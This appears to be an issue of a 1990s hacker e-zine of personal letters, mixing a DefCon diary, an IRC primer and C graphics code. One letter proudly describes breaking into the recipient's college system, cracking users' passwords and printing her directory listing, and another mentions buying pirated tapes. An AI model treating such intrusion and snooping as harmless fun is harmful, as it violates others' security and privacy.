18, so I had to leave. We all went to a couple more casinos.. Melanie followed me back to the hotel room. We like watched TV. We all went to sleep soon after that. Melanie had her own bed, and Jake, Brian and Ryan insisted that I take the other bed. Though I told them they could have it. It felt good in a way, I had been sleeping on the floor the whole 2 weeks in CA. Well the next moring we woke up (Isn't that a surprise) =) We all got registered at the Defcon exhibit room. I went and hung around Defcon, because I started noticing a bunch of familiar faces. I talk for a long while. Melanie is down with me soon and she spots Zoop. Zoop was surprised to see me there, he is only like 16. Zoop told me that he had been looking for Emily and Jason. Zoop told me that Emily was wearing a t-shirt with a happy face on it. Later I was sitting at a table in the casino with Melanie, Zoop and Brian, and to my total surprise some guy introduced himself as "Andy Conov" to Mel. I was yelled out "Andy!!" "This is Zeed" (You see, Andy and I are always online at night trading hacker stuff, he is a good friend) He didn't believe it was me at first. He says: "I was expecting Zeed to be a short little guy, hehe" I talked to Andy a long time, and you know. Andy was actually pretty much the way I imagined him. Anyways, Mel, brian,ryan and I all went to the Hard Rock Cafe to eat dinner. Right before we left to walk to the parking lot, I spotted a tall nice looking girl wearing a happy face t-shirt. I recognized her face from a gif too. I stopped her dead in her tracks and said: 'Emily?!?" "This is Zeed!" I noticed this tall short haired guy in the background behind Emily staying his distance from me. I said "Is that Jason?" She said "yes". He like was trying to not get near me.. (We didn't always get along, hehehe, I think he though I might start something with him) Well I gave her my room number and she gave me hers. I told her that we were off to eat dinner and that we will be seeing each other soon. Well, we ate at the Hard Rock Cafe. I had a veggy burger ;) Then we got back to the hotel room. Brian, Ryan and Melanie kind of were ready for bed. I wasn't. So I went to hang out at the Defcon room, there I met up with Zoop again. We we watched Hacker Jeopardy, and Jake was a contestant. They were like handing out beers and stuff, it was a really lax enviroment. People were just having pure fun. In that room though were all kinds of neat people. Winn Shwartu, he is the Author of "Information Warfare". He was the host of Hacker Jeopardy. The producer ot the movies "War Games" and "Sneakers" Erik Bloodaxe, famous hacker from the Legion of Doom Dan Farmer, the Author of SATAN and others... During hacker jeopary, I won a free t-shirt cause I was the only person who could asnwer one of the questions. It was relaited to video games so =P Well Hacker Jeopary started winding down and beers were everywhere. Right before we left, Zoop grabbed one for himself. Zoop and I explored around the casino a while. Andy found us again, and we all hug out in the lounge where they were playing music. Andy and his friend from montana were a little tweeked though ;) His friend tried to climb one of the fake palm trees in the lounge, hehe. They were both acting really silly. We talked some more. Then Andy and his friend took of to go back to their hotel, Circus Circus. Zoop and I went to the excaliber to eat. There, Zoop talked about some AOL secrets and I talked about some internet ones. I ordered a Chicken Quasedilla =9 It was too spicy though, hehe Well, I finally got back to the hotel room at around 4am. Everybody was sound alseep, I was afraid I might step on somebody, hehe. A room for 2, with 5 people sleeping in it. Well the next moring we hung out at the Defcon room again, and I met up with all my friend form the Los Angeles 2600 meetings, it was cool. While I was schmoozing around Defcon with my friends, Melanie won about $400 on the quarter slot machines. It was this day that I noticed that maybe she wasn't having so much fun at defcon. (it's a long story, but in the end it turns out that she wanted to do more thigs with just me) (She didn't talk much, or say much. So I didn't know really she wanted to do) (Though I did arrange a trip to a Dolphin show at the Mirage. ) (I think it was just a bunch of weird personal feelings about each other) (I had kind of brought things down to a "friends" level before we met at defcon) (I did give her a big hug though, and a little silver dolphin necklace, cause she loves dolphins) (It's a long story, I don't know if you care to hear it or whatever.) (I guess I had fallen in love with Melanie without even meeting her or even knowing what she looked like) (About 2 weeks before defcon, I kind of freaked out and slowed things down majorly) (I got so depressed over the whole thing, cause I knew I was making mel hurt inside so much) (She really wanted me to be her "close" friend, we had even made plans to be roomantes in OK) (It was so hard to watch her feelings get hurt and for her to be sad, the worst feeling of it was that I was causing all this) (The reason I mention all this now and here, is because this all had a major impact on what went on during the days in vegas.) (It's still a painful thing for me, and something were I made lots of stupid decisions) (It's my fault, I am 18, never had a girl friend, and all this was just new to me) (btw, please don't talk about this to anybody) (Maybe you understand? :) Well where was I.... Oh yeah, well I met up with Andy and Zoop again. We all talked, and had lots of fun. My friend Ryan from San Jose even bumbed into one of his old friends. I went into the speaking room to record the speakers. Well, the first thin I here is: "John! come here." I turn around and it is Emily, sitting next to her friend Rudy (He was sort of her chaperone). I sat down next to Emily for a while, odly enough I don't remember saying much to her. Then she left a while later. I met up with Mel and Brian in this room while I recorded the speakers. I saw Emily come in with Jason and they sat down somewhere else. all of a sudden.. "FED!!!" (Somebody had spotted a fed) So Dark Tanget grabs the microphone a begins to interogate the fed, hehe. So the guy whips out his Badge and waves it around showing it to everybody. He gives his little resume type thing to Dark Dangent, and it turns out this guys is a US Customs Agent. Some of the speakers included: an ex-CIA case officer. ex-FBI director of computer division. Computer security specialist. There was even a little bit on women hackers. (They like profiled some women form IRC) and more neat people ;) Well then things wound down... Emily, Jason, and their friend Rudy(not akira) came up to my room) It was a delicate situation, I knew that Melanie didn't really think all too highly of Emily. Also, Melanie even admited to me that she is jealous of girl I talk to(This was on aol she told me this once). So I knew it might be a weird situtation. But, Emily really wanted to meet Melanie. Well Emily was really friendly with Melanie, and I thought it worked out ok. Thoug mel didn't say much. This gave me time to take pictures of Emily, hehe ;) We all talked for a while.. Then they had to leave, and mel and I went to play slots. She won more money, hehe, but then they kicked me out of the casino. I went with Melanie to our room. She started talking to me about if I was going to visit her in nov. out in Oklahoma. I was explaining to her that my parents might be moving again, and that I have no idea and that I can be certain that I will be able to do anything. Well, in the middle of our little intimite conversion, Brian comes back to the hotel room. Brian and Ryan are telling me all these stories about seeing Elvis walking down the street. I could tell Melanie wanted them to leave.. Anyways, they left, but then Andy came knocking on the door a couple seconds later. I started talking to Andy and Melanie pretty much bolted for the door not saying where she was going. This at the time had me thinking that Melanie really disliked me or something. (I later found out, that she left cause she was going to break out in tears =\ ) (She thought I was rejecting her or something, it's so complicate though, I can't explain it all here) (I am still somewhat confused by it all) Well at this time though, I though she wanted no part of me. So I went off with Andy back to the convetion. There I met up with Brian and Ryan and we watched hacker jeopardy. It was a blast, they were giving away all kinds of free stuff, and of course.. beers =) Ryan took me to the Luxor and showed me their giant Sega Arcade. The I met up with Brian, and Ryan went back to the room to sleep. I met up with a friend that I know from the New York 2600 meetings, Sid (Sid Vicious). Well around this time Jake came up to me and asked me if I wanted to go with him to this huge bachlorette party in the hotel somewhere. hehehe, I didn't exactly give him a yes or no answer ;) I said "Umm, let me find Brian" By the time I found Brian, Jake was gone. Don't I just have all the luck? =) Well Brian, Sid and I went around, checked out the hot tubs, hehe, Naughty hackers were in the hot tubs. So then we went to the food court and we got some food. Then we played a few slot machines.. All this time we were trying to find something to do, or at least find Jake. Well Sid split up from us, and Brian and I just went and had something to eat a drink again. We talked a majorly goofed around. I was so tired and hungry, I must have looked like a zombie. I was like wired, my sentences hardly made any sense, and Brian and I talked like 15 minuts straight on some formula for Artificial intellegence on a computer. We were wacked. Well Brian and I went back to the hotel room, and we both agreed that we would both take Melanie to the Airport. We woke up, and Melanie was like all packed a ready to go. So I got ready, and the 3 of us went to the Jeep and drove the Airport. Melanie hardly said a word. Well we got to her gate and everything, I put her lbag beside her. I said: "Well, I hope you have had a fun time here Melanie, I know I did..." She just said" Yeah, it was fine." I didn't really know what to do, so I said goodbye and Brian and I left back for the hotel. (I found out later that she wasn't really mad at me, just upset that I didn't do more with just her.) (I really wish she conveyed her feelings better though, I mean.. I am shy, but even I make suggestions, espcially if this person is your best friend(As melanie says I am to her)) (Melanie told me later that she cried on the plane trip back) (I feel sooo bad :( , what could I do?, it was like the toughest situation I had ever been in) Well. We wrapped up the day, I met Andy at the last minute and gave him his stuff her left in my room. I said goodbye to all my friends at Defcon... And we headed back to Arizona..... I am really sorry Mazzie if I really ruined this whole thing with talking to you about Melanie. It's just been in my mind a lot, and well I guess a lot of people probably wondered about Mel and I. We were like the center of a bunch of stupid rumors. I have many mixed feelings about Melanie right now. I think she went a little to far, but I guess it is my fault for getting her so envloved with me. Melanie is my friend, and I had been talking to her a lot, trying to make her feel better and be her friend up til a week ago. (Now there is a huge new develpomenet with Melanie that doesn't evolve me.) I like her a lot as a friend, but I know now that she is not the girlfriend I want. I am really confused right now, and not sure where my life is leading. I really don't want to burden you with my crazy life problems though. I am just happy that I have somebody like you talk to. You don't know how much I appreciate having friends like you. Well anyways.. enough of that stuff.. Here is some other info. Do you have a www browser like Netscape? or something? I have my WWW page set up, it's still in developement though. Check it out :) Umm, I would love to put your picture on my web page, but I am not going to do it without your permission. If you don't want to, I understand. I just made a little section for my friends picture, soon that section will have my new picture on it too. Well, how is Mazzie the IRC queen comming around? Know all the commands yet? hehe Here are some commands you could use: /join #devo (Join devo channel) /mode #devo +o Zeed (if you have +o (operator powers) you can give them to others /load textbox.irc (If you still have textbox.irc, it's a neat script, you can go into multiple channels at once) you could do: /join #devo /join #pain /join #hack And you would be in all three channels.. Though when you typed it would end up in #hack, because thats the latest room you switched to. To switch between rooms (When you have textbox loaded) just type /join #devo or whatever. Now you would be tlaking to #devo. But you did not leave those other channels. To leave a channel do this /leave #devo is you see somebodies nick and you want to know a little more about them , type: /whois zeed or whatever nick. (note their domain name, like Orange@nether.net) You can execute unix commands from IRC..... use the exec command /exec since finger is a unix command, you could do this. Finger shows you info about me and my system. Not all people have finger info though. If you want any info for when people finger you, edit a file in your unic directory called .plan. you could put what ever you want in it, that file is shown to people who finger you. if you want to see who is in a particular channel do this /who #devo Each channel can be programmer with different mode. You might see something like this: Zeed has changed the mode to #devo to +i Well this means I made the channel invite only, meaning that I have to use the /invite command to let them in. here are some more modes: +t This controls who can set the topic in the channel. if it is +t then only +o people can set it. +s This makes your channel a secret channel. +n This makes it some people can't write messages to the enitre channel. +m This makes the channel mediated, where pretty much only people with +o can talk in the channel. +l L sets a limit on the number of people who can be in a channel. you set the mode by doing this for example. /mode #devo +s if you want to take a mode off, just do this: /mode #devo -s To change the topic in the channel you can do this: /topic #devo Mazzie is the greatest.. (This makes the topic = Mazzie is the greatest..) =P ok, one problem with IRC though is that has what we call "lag" Sometimes it's less then a seccond. other times it's a lot longer. When you use IRC you are hooked up to a irc server. irc servers are what get lagged.. What you want to do is avoid the lagged servers and go on the fast ones. If your server slows down while you are on it you want to change servers. one way to see how big the lag is by "pinging" somebody if you did: /ping zeed and it respunded with: 3 seconds. The we are doing ok. If you never get a ping respounce, or if it ends up to be like 200 seconds, then you have trouble ;) A ping is like a echo bouncing of something. Anyways, to change servers you use the /server command /server irc.escape.com would work. There is usually a little delay between switching servers. Here are some fast servers for irc. irc.escape.com sgi.texas.net irc.texas.net irc-2.mit.edu irc.eskimo.com Hmm, what else..... oh, to send private messages to people on IRC. you use the /msg command. like I would do this /msg mazzie Hey cutie! Private messages look a little different then channel messages. When you are using textbox, private messages will beep too. Thank you for attending Jean's small course of IRC 101. =) wow, I have been writing this for like 3 hours.. hehehehehe oh well. Say "hi" to all your roomies for me :) and I hope you saved me a piece of pizza, because I am going to meet you one day >=) hopefully at least =P Well, I am going to get duplicates of this film from defcon, and i'll send you all kinds of neato stuff :) I hope college isn't going to be too hard for you =\ I know you will do well though. You are very smart :) See you soon, {{{{{{{{{{{{{{{{{{{{{ Tabitha }}}}}}}}}}}}}}}}}}}}} Happy birthday!!! Love, Jean-Christophe (isn't french just spiffy?) =) PS: As you know I have changed my phone number some time ago, did I give you the new one? {{{{{{{{{{{ Mazzie }}}}}}}}}}}}} Sorry if I rambed on, or made no sense what so ever ;) It's 8:00 am here, and I had been working on my web page all night, but I just had to write you! ------------------------------------------------------------------------------ A Confession of Stupidity by Zeed I bet you didn't know I was much of a hacker? :) I don't usually talk about hacking with you... Well this morning I was bored, and so I decided to take a loot at your schools computer. I was just nosy ;) Anyways, I broke in =P I have the entire password file for your whole college... Mind you though, the passwords are encrypted and so I had to run my different programs on the password file to help me unencrypt it... All I can say is "bravo" you must have picked a good password. ie. one that isn't a word in any language. I couldn't crack yours, if i had I would have just showed you it for amusement thats all ;) I did crack lots of other, not so wise people's passwords. Hmm, you don't believe me.. That I broke in? =P Here is your home directory with all your files in it ;) --- /u/s/tgreiner % ls mail textbox.irc % ls -la total 307 drwxr-xr-x 3 tgreiner 512 Aug 29 22:12 . drwxr-xr-x2025 root 36352 Aug 30 09:03 .. -rw-r--r-- 1 tgreiner 0 Aug 27 13:32 .addressbook -rw-r--r-- 1 tgreiner 1257 Aug 27 13:32 .addressbook.lu -rw-r--r-- 1 tgreiner 29 Aug 17 1993 .bash_login -rw-r--r-- 1 tgreiner 25 Aug 17 1993 .bashrc -rw-r--r-- 1 tgreiner 24 Aug 17 1993 .cshrc -rw-r--r-- 1 tgreiner 320 Aug 29 22:13 .history -rw------- 1 tgreiner 0 Aug 28 21:09 .ircmotd -rw-r--r-- 1 tgreiner 24 Aug 17 1993 .login -rw------- 1 tgreiner 22925 Aug 27 13:33 .pine-interrupted-mail -rw-r--r-- 1 tgreiner 5433 Aug 29 22:12 .pinerc -rwxr-xr-x 1 tgreiner 21 Aug 17 1993 .profile drwx------ 2 tgreiner 512 Aug 26 21:11 mail -rw-r--r-- 1 tgreiner 221435 Aug 26 21:05 textbox.irc % -------- Now, don't worry :) I am a good boy, I won't do anything bad to this computer :) It's the same deal with that college in Vancouver I might be going to, I already broke into their's too. I leach stuff off of it, but I have and never will damage it. I am sort of their protector. You have to admit that I am the the everyday type of hacker you see in 'hack' , eh? I am just being silly =) But, I get a cookie for being a good hacker don't I? =) Well I hope things are going good with you.. I hope school is fine :) I sorted out the pictures I am going to send to you... I am going to put some other stuff together, and send it off ;) Love, Jean btw. 'ls' is the command in unix that shows you what files are in your directory ;) I noticed that the only commands you had typed were: irc exit pine Am I being too nosy? Sorry, hehe. I just had to show off my latest hack =) ------------------------------------------------------------------------------- My Night With a Narq by Zeed Just thought I would say " hi " ;) I another went to a NYC 2600 meeting last night, it was a lot of fun :) I swear I might only go out and do something fun once a month, but it's worth it :) Lets see.. First I hung out there and talked to my friends about the normal hacker stuff, it's kind of neat. I can see some of the little lamers looking at me in the background looking at me like if I was some sort of hacker god. Here I am with like 6 people around me most of them are at least 10 years older then me and we are all talking about the latest tricks and things. I had my defcon t-shirt too, so I was elite ;) Anyways, I was there talking and Evian walked by me and rescued me from that crowd. She just walked by me and grabbed my shirt and I thought, hmm, who would I rather talk to right now.... A bunch of middle age hackers or one of my friends, so I left the crowd of hackers. I went with Evian and sat down, I showed her all my pictures from defcon. Now she officially knows what My 2 friends from CA , Jason, Emily, Melanie and Andy Conov look like. It was fun :) I didn't have too many cool pictures. The one thing that sucked though was that Rage and Plot said that they were both going to show up. They never did though, so Evian and I tried calling up Rage to see what was up. We were like using all these codes and things to try to make calls, the damn payphones kept eating her quarters. hehe, they are getting us back I guess. Well Plot and Rage never did show up, oh well.. Oh, lets see, who else was there.... Do you know Cameo (Davi, mistressx, etc) she was there all the way down from Mass. (6 hours away). She was nice to talk to, she was a lot more prettier then her friends would tell me. I didn't talk to her though a lot, between me and you, she is sort of a hacker groupy I think. She just goes to whoever seems most 'elite', thats how I met her origonaly. I was on aol a couple weeks ago and KT, Next, and some others were like calling me the god of the internet, etc... Odd, enough I got an IM from here a couple minutes later, and I ended up calling her. I am not saying that she isn't a very sweet person, it's just I wasn't always so 'elite' or knowledgable and people would never wanted to talk to me and my friends. Now it's funny, it's like people just want to 'know' me. I did talk to her a while, but she mostly talked about hacking. I really would usually talk about other things then computers with my friends, hehe, they are so boring ;) Lets see, Evian is much more sincere of a person. We both sit there making fun of the "elite" people walking around the meeting. She is neat =) Hmm, I met another girl there, maybe not as old as Evian(like 28) but maybe a little younger. I don't know why she wanted to start talking to me, maybe it's my new hair cut ;) She was interesting though, she like sets up WWW servers and enviroments, which I thought was cool because thats what I am sort of trying to do. (Trying, because it requires $$$) I think I am becomming more comfortable about meeting people and meeting women (I am very shy), but I was kind of surprised she started talking to me. If I do move to Vancouver in Januaury (it's very likely) I am going to miss these people, they are so nice, all of them.. I hate moving =`( My friend that I like see every month (The OMNI magazine reporter) was there again. He talked to me a little while, hmm, maybe he is writing a book on me ;) He like mostly talks to me.. hmm. There was also a NY times reporter there with her photographer. My friend PMF (He is originaly from Brittain) went off on hacking for like 30 minutes talking to this reporter. Talking about the difference between hacking and phreaking, he was having his day in the sun. He has got to be one of the most knowledgable people I know when it comes to hacking. I bet he is going to be all over the NY times. Then the photographer was going crazy with taking pictures.. This other guy I know "Dennis" (Elite entity, he probably one of the most notoruis hackers here other then Phiber Optik) started really harrassing the photographer, he was telling me how pissed he was at her taking pictures. He was also VERY drunk, I left right when she called a security guard on him. I wonder what happend. Anyways, PMF, DTMF and I all went to Mac Donalds (It's three stories high ). I talked with them about all sort of things, PMF seems to know just about everything :) He could pull credit reports, change your phone number, find out all kinds of goodies ;) He got busted though for breaking into a System 75, so he a lot more cautious. We went back to the meeting after Mac Donalds but everybody was gone.. So DTMF took his subway, and I went with PMF on the subway to 42nd street. Now if you know about NY you know about 42nd, you can pretty much get anything there. It has like a bunch of adult theaters and movie stores on it. Anyways, we went there to go get some pirated movies. PMF knew 2 places there that had movies like Mortal Kombat and Clueless already on tape. I bought mortal kombat for $10 just to see what the quality would be like, it's more of a novelty item for me. PMF got a couple moves. BTW, PMF is 24. Hmm, I don't know if I should tell you this ;) We did go into n adult movie place, he was like looking for a particular movie.. I just followed him in. I was sort of amazed at how much of that stuff they sell in there. They had 1000s of videos, umm, and a bunch of weird other things, some I have yet to figure out ;) We didn't stay long, and I don't even know if I was old enough to be in there, but really didn't care. I was in NY just to have fun and to get out. I think they were ready to card PMF, but they never really looked at me. Hmm, must be all that facial hair ;) Anyways, after 42nd st, we tooka subway to out train. We almost went on the wrong train!! We were there sitting on the wrong train for like 30 minutes. 2 girls came on the train and asked us if this was the train to Morristown. PMF says "No this goes to Suffern NY, but you can come with us" He is such a joker :) So they got off that train.. 10 minutes later the 2 girls come back and say "Umm, This train is going to Morristown, but you guys can could with US" (hehe, roll reversal) So we got off that train and jumped on the right train. Soon we were off, PMF got off at the 3rd stop. I stayed on till my stop wich was a lot farther down. I had lots of fun :) hehe, my life is so meager isn't it? ;) All I did was hang out, go to mac donalds and bought a pirated video. Well I did meet some new people.. But, thats all it took for me to have fun ;) Well, I am going to have these pictures duplicated soon. Would you like a picture of me too? I have some of me at defcon, but they aren't terribly good. I hope everything is going well for you, and all that school work isn't killing you. Love, Jean ------------------------------------------------------------------------------ Creating Your Own Startup Computer Company by Zeed I was bored out of my mind in math class.... So I started designing my company out ;) I could bore you with all the technical stuff, I will spare you. I started designing the logo, the corperate head quarters, everything ;) I am going to do business in europe, taiwan and Japan. The reception area to the company is going to be a big room, with arcade games on lined up on both sides. and a huge "Zeed Enterprises" logo painted on the floor. I have like everything planned out. I even have a list of people I need to hire to work for me. programmers, artists, musicians, etc :) Zeed Enterprises, Software developement for the: PSX, Saturn, SNES, Genesis, Win '95, Amiga 4000, UNIX. Internet service provider and www server provider. UNIX security analysis and auditing services. Thats like what my business card will say ;) All of this pretty much hinges on if I get accepted to that school in Vancouver, Canada. If I don't, I am going to probably go more heavily into just Sega Saturn and UNIX and Unix security. Look out Acclaim, Sega and Nintendo =P Here I come :) ok, there was my grandious delusion. It's going to happen though >=) That or something better. I have very high goals for myself, when I don't achieve them I get depressed. I am imagining this all in Southern, CA , maybe Northern , CA. Hmm, well today I am going to get some things done.. I have to finish two programs for this school in Vancouver (I am going to brag to them =P) One program is a small game, and the other is a 3-D demo I am working on(right now it's just all in my head). The little game is about %75 done. The game is written in C, and I haven't decided if I am going to write the demo in Intel assembley language or in C. Yuck!! floating point math and trig in Assembley, ahhh!! shhh, don't get mad at me, I am just getting corny, I know you could care less about floating point math ;) Well my 486 is running, so I am in the slow rebuilding process. Oh the joys of PCs. My next computer will be a Silicon Graphics workstation, hell with this microsoft crap ;) umm, I am talking about computers too much... I think I will interrogate you >=) What type of music do you like? Did you ever have pink fuzzy bunny slippers when you were a kid? some interogation... So much for my lawyer career. Guess what? My dad is in Saudi Arabia right now =P Talk about long distance calling. Sorry about not pestering you for the last couple days... I couldn't use AOL or anthing, not even Windows. So I was unable to bug you with my ever so timely email. I'll make it up to you though, I promise. Did you miss me while I was gone? I thought so.. :) hehehe When I go away for extended periods of time everybody misses me. Then a couple days later after I come back, they wish I'd leave again =) You know, every time I think of your real name, I think of "bewitched". Nooo, don't hit me, I know that I am probably like the 1 milionth person to say that to you. I just had to say it ;) Well, I must leave now... I do believe I have work to do if I am to start a company in 2 years. a bien tot. Jean John, John, the leprechaun, went to school with nothing on.......... (I hated that stupid saying, I heard it like every day in first grade) ------------------------------------------------------------------------------ Graphics Research by Zeed Whats new? Man, I have been programming all day log. I woke up this morning and before I even opened my eyes, I was thinking about this program I wrote. It had a major bug in it, so I was debugging it in my head. I fixed the bug in my head, opened my eyes and grabbed a piece of paper and wrote the entire sub-routine for this new function. This function rotates a 40 by 80 pixel box and maps it into a 100 by 100 box. So I had to develope an algorithm that would rotate the entire image according to how many degrees I tell it to rotate. This envovled some trigometry. Here I will show off to you what I wrote this morning, right when I woke up ;) ---------------------- int rx,ry; float cx,cy; float sx,sy; int sxx,syy; unsigned char col; float cc,ss; /*cosine and sine value so we dont have to calculate more then once */ for(rx=0;rx<10000;rx++) swap[rx]=0; // clear out buffer angle+= .1; for(ry=0;ry<40;ry++){ for(rx=0;rx<80;rx++){ col= buf[ry*80+rx]; if (col!=0) { /* don't rotate if pixel has no color */ cy= 20 - ry; cx= rx - 40; cc= cos(angle); ss= sin(angle); sx= cx * cc - cy * ss; sy= cy * cc - cx * ss; sxx= sx + 50; syy= 100 - sy - 50; swap[syy*100+sxx]= col; //vmem[(((syy+16)<<8)+((syy+16)<<6))+sxx+17]= col; //to bypass plotbk } } --------------------------------- yeah, I am sure you understood all of it ;) This is C by the way umm, btw. An admin at your college found out about me about an hour ago. He just kicked me off and changed my password. oh well :) where was I? oh yes, the algorithm.. Would you beleive there is still a bug in it somehwere, ahhhhh, I hate debugging. I guess that means I shoulded just write big free code. A weird thing happend on AOL today, I met two girls right after another.. Both IMed me first and both just started talking to me. I am becomming sort of a famous person, hmm, like you :) hehehe. I think you have heard of both of them, whats werid though is that I did not know either before today. Just heard of them. Quagmire and Jill from TX. Quagmire is nice. Jill, well she is just a kid, and besides, I thought I remember hearing stuff about her a while back ;) It never hurts to meet new faces though, thats just my little story though. I popped intho 'hack' for a second and I get people IMing me. I usually ignore all the guys, unless I know them. Sheeesh, me and my online friends, I am just going to get myself into another bad situation. I swear, I am building this like huge library of pics of my friends, hehehe. I guess I am not going to be seeing "hackers" this weekend. Evian called me last night and said she was doing stuff with her family or something this weekend. Oh well :) Will you come with me to see it? hey, it's the thought that counts :) I am going to play psycologist for a second. Tell me if I am wrong. I get this feeling about you... Like you like talking to people online and stuff, and being their friends because it's online only. You don't have to worry about anything else, and they are there whenever you need them. I am not saying that you don't have or like friends in the flesh world. I am just thinking out loud. Do you like the thought of ever meeting anybody you have met online in person? or does that scare you somewhat, or maybe you think it will shatter your own little makebelieve world. I am just curious. I was doing a lot of thinking on my part about myself. Please do not take this the wrong way. I could have asked it to anybody. I am just like I said, comming up with theories and poundering them ;) I am just wondering what your opinion is. My sympathese are with you... (all that homework) Take care.. <----------------------------------------------------------------------------> Thus concludes FEH #4. See you again in a month or two.